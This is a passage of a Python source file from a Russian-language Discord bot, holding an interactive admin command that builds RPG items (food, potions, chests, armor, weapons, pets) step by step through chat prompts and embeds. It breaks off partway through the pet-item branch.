| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c9ded932c859f687f63211cab9156cc45d8f208
| 114,603
|
py
|
Python
|
Cog/rpg.py
|
Rimuwu/Ranga
|
1a4d4545eaf4c86a8c53b4efe9d103fe57502963
|
[
"MIT"
] | 5
|
2021-09-10T15:43:40.000Z
|
2022-02-05T12:28:40.000Z
|
Cog/rpg.py
|
Rimuwu/Ranga
|
1a4d4545eaf4c86a8c53b4efe9d103fe57502963
|
[
"MIT"
] | 5
|
2021-09-10T16:38:23.000Z
|
2022-01-22T17:08:33.000Z
|
Cog/rpg.py
|
Rimuwu/Ranga
|
1a4d4545eaf4c86a8c53b4efe9d103fe57502963
|
[
"MIT"
] | 2
|
2021-09-10T15:50:52.000Z
|
2022-01-11T18:31:43.000Z
|
import nextcord as discord
from nextcord.ext import tasks, commands
from PIL import Image, ImageFont, ImageDraw, ImageOps
import io
import sys
import random
from random import choice
import asyncio
import time
import pymongo
from fuzzywuzzy import fuzz
import pprint as pprint
sys.path.append("..")
from functions import functions as funs
import config
client = funs.mongo_c()
db = client.bot
backs = db.bs
servers = db.servers
class rpg(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(usage = '-', description = 'Создание предмета.')
async def create_item(self, ctx):
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
async def name_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if len(message.content) > 150:
await ctx.send("Название больше 150-ти символов")
return False
else:
return msg.content
async def act_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def image_f(message, ctx):
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
image = msg.content
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return False
if msg.content == 'none':
image = None
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
return image
async def quality_f(message, ctx):
try:
text = "**Качество предмета влияет на процент его выпадения и крафта**\n`n` - <:normal_q:781531816993620001>(normal) обычное качество, шанс выпадения/крафта 100%\n`u` - <:unusual_q:781531868780691476>(unusual) необычное качество, шанс выпадения/крафта 75%\n`r` - <:rare_q:781531919140651048>(rare) редкое качесвто, шанс выпадения/крафта 50%\n`o` - <:orate_q:781531996866084874>(orate) оратное качество, шанс выпадения/крафта 25%\n`l` - <:legendary_q:781532085130100737>(legendary) легендарное качество, шанс выпадения/крафта 10%"
emb = discord.Embed(title = "Качества:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['n', 'normal', 'u', 'unusual', 'r', 'rare', 'o', 'orate', 'l', 'legendary']:
if msg.content in ['n', 'normal']:
quality = "n"
elif msg.content in ['u', 'un normal']:
quality = "u"
elif msg.content in ['r', 'rare']:
quality = "r"
elif msg.content in ['o', 'orate',]:
quality = "o"
elif msg.content in ['l', 'legendary',]:
quality = "l"
return quality
else:
await ctx.send("Вы указали не действительное качество предмета, выберите 1 из (n, u, r, o, l) и повторите создание снова!")
return False
async def description_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def action_m_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def race_u_f(message, ctx, server):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content == 'all' or msg.content == 'none':
return None
else:
races = list(server['races'].keys())
c_races = msg.content.split()
s = list(set(races) & set(c_races))
if s == []:
await ctx.send("Не найдено ни одного совпадения с созданными расами!")
return False
else:
return s
async def element_f(message, ctx):
try:
text = "`w` - <:water:888029916287885332>(water) Огонь >`х0.75`> Вода >`х1.25`> Земля\n`a` - <:air:888029789749919787>(air) Земля >`х0.75`> Воздух >`х1.25`> Огонь\n`f` - <:fire:888029761828425789>(fire) Воздух >`х0.75`> Огонь >`х1.25`> Вода\n`e` - <:earth:888029840945598534>(earth) Вода >`х0.75`> Земля >`х1.25`> Воздух\n\n<:fire:888029761828425789> >`х1.25`> <:water:888029916287885332> >`х1.25`> <:earth:888029840945598534> >`х1.25`> <:air:888029789749919787> >`х1.25`> <:fire:888029761828425789>\n\nУкажите `none` если у предмета нет стихии."
emb = discord.Embed(title = "Элементы:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['fire', 'water', 'air', 'earth', 'none', 'w', 'a', 'f', 'e']:
if msg.content in ['w', 'water']:
el = "w"
elif msg.content in ['a', 'air']:
el = "a"
elif msg.content in ['f', 'fire']:
el = "f"
elif msg.content in ['e', 'earth',]:
el = "e"
elif msg.content in ['none']:
el = None
return el
else:
await ctx.send("Требовалось указать 1 из элементов! (w, a, f, e)")
return False
async def emoji_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
test_msg = await ctx.send("Тестовое сообщение\n Не удаляйте его, оно быдут удалено автоматически при наличии прав у бота")
list = []
try:
await test_msg.add_reaction(msg.content)
except Exception:
await ctx.send("Требовалось указать :emoji:")
return False
try:
await test_msg.delete()
except Exception:
pass
return msg.content
server = servers.find_one({"server": ctx.guild.id})
item = {}
def embed(type = 'Не указано'):
nonlocal server
emb = discord.Embed(description = "**Создание предмета**", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
message = await ctx.send(embed = embed())
try:
await message.edit(embed = embed(f'Укажите тип предмета: '))
emb = discord.Embed(title = "Типы:",
description = "`eat` - еда, воостанавливает или отнимает у пользователя здоровье при использовании\n`point` - зелья здоровья или маны\n`case` - сундуки с случайным предметом\n`armor` - броня, при использовании устанавливает броню\n`weapon` - оружие, может быть: дальнобойного, ближнего и магического стиля.\n`pet` - питомец\n`material` - материал, его нельзя взять в руки или съесть, но если вам надо создать руду или стрелы, вам сюда.\n`recipe` - рецепт для крафта\n`role` - роль, при использовании выдаёт роль\n`prop` - не играбельный предмет, выполняющий функцию декорации", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['eat','point','case','armor','weapon','pet',"material",'recipe','role','prop']:
item.update({ 'type': msg.content})
else:
await ctx.send("Вы указали не действительный тип предмета, выберите 1 из (eat, point, case, armor, weapon, pet, material, recipe, role, prop) и повторите создание снова!")
return
type = msg.content
if type == 'eat':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Питательность предмета", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите питательность `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
await message.edit(embed = embed(type, name, act, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, image, quality, description, action_m, race_u, element, emoji_v))
elif type == 'point':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Мощность предмета", value = f"{act}")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите мощность `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
text = "`heal` - при использовании зелья, восстановит здоровье пользователя.\n`mana` - при использовании зелья, восстановит ману пользователя."
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['mana', 'heal']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (heal, mana) и повторите создание снова!")
return
style = msg.content
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, emoji_v))
elif type == 'case':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if act != 'Не указано' and act != f"Укажите id предметов выпадаемые из `{name}`\nПример: 16 52 13" and act != None:
emb.add_field(name = "Выпадаемые предметы", value = f"{','.join(str(x) for x in act)}")
else:
emb.add_field(name = "Выпадаемые предметы", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
try:
await message.edit(embed = embed(type, name, f"Укажите id предметов выпадаемые из `{name}`\nПример: 16 52 13"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
act = []
try:
try:
act1 = msg.content.split()
for i in act1:
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
item.update({ 'act': act })
await message.edit(embed = embed(type, name, act, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, image, quality, description, action_m, race_u, emoji_v))
elif type == 'armor':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Защита предмета", value = f"{act}")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите защиту `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
text = "`add` - при использовании добавляет броню.\n`set` - при использовании устанавливает броню."
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['add', 'set']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (add, set) и повторите создание снова!")
return
style = msg.content
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, element, emoji_v))
elif type == 'weapon':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
emb.add_field(name = "Урон предмета", value = f"{act}")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, f"Укажите урон `{name}`"))
act = await act_f(message, ctx)
if act == False:
return
else:
item.update({ 'act': act})
text = "`sword` - меч\n`staff` - посох (условно, может быть чем угодно), тратит ману при использовании\n`bow` - лук (условно, может быть автоматом или чем угодно) тратит указанный предмет из инвентаря при использовании."
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['sword', 'staff', 'bow']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (sword, staff, bow) и повторите создание снова!")
return
style = msg.content
if style == 'bow':
try:
mmsg = await ctx.send("Укажите используемый для стрельбы предмет (id):")
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
iddd = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
try:
server['items'][str(iddd)]
except:
await ctx.send("Требовалось id существующего предмета!!")
return
item['bow_item'] = iddd
try:
await mmsg.edit(content = f'Укажите используемый для стрельбы предмет (id): {iddd}')
except:
pass
if style == 'staff':
try:
mmsg = await ctx.send("Укажите количество используемой маны:")
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
ni = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
if ni < 0:
await ctx.send("Укажите число больше или равное нулю!")
return
item['mana_use'] = ni
try:
await mmsg.edit(content = f'Укажите количество используемой маны: {ni}')
except:
pass
if style == 'sword':
try:
mmsg = await ctx.send("Укажите прочность (0 - бесконечная прочность):")
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
ni = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
if ni < 0:
await ctx.send("Укажите число больше или равное нулю!")
return
item['stabl'] = ni
try:
await mmsg.edit(content = f'Укажите прочность (0 - бесконечная прочность): {ni}')
except:
pass
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, element, emoji_v))
elif type == 'pet':
def embed(type = 'Не указано', name = 'Не указано', style = 'Не указано', act = 'Не указано', image = 'Не указано', chance = 'Не указано', damage = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип", value = f"{type}")
emb.add_field(name = "Имя питомца", value = f"{name}")
emb.add_field(name = "Стиль питомца", value = f"{style}")
emb.add_field(name = "Процент улучшения", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение питомца:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Шанс атаки", value = f"{chance}")
emb.add_field(name = "Урон", value = f"{damage}")
emb.add_field(name = "Редкость питомца", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
text = "`hp+` - бонус к здоровью.\n`mana+` - бонус к мане.\n`damage+` - бонус к урону.\n`armor+` - бонус к защите.\n`mana-` - уменьшение использования маны"
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, f"Укажите стиль `{name}`"))
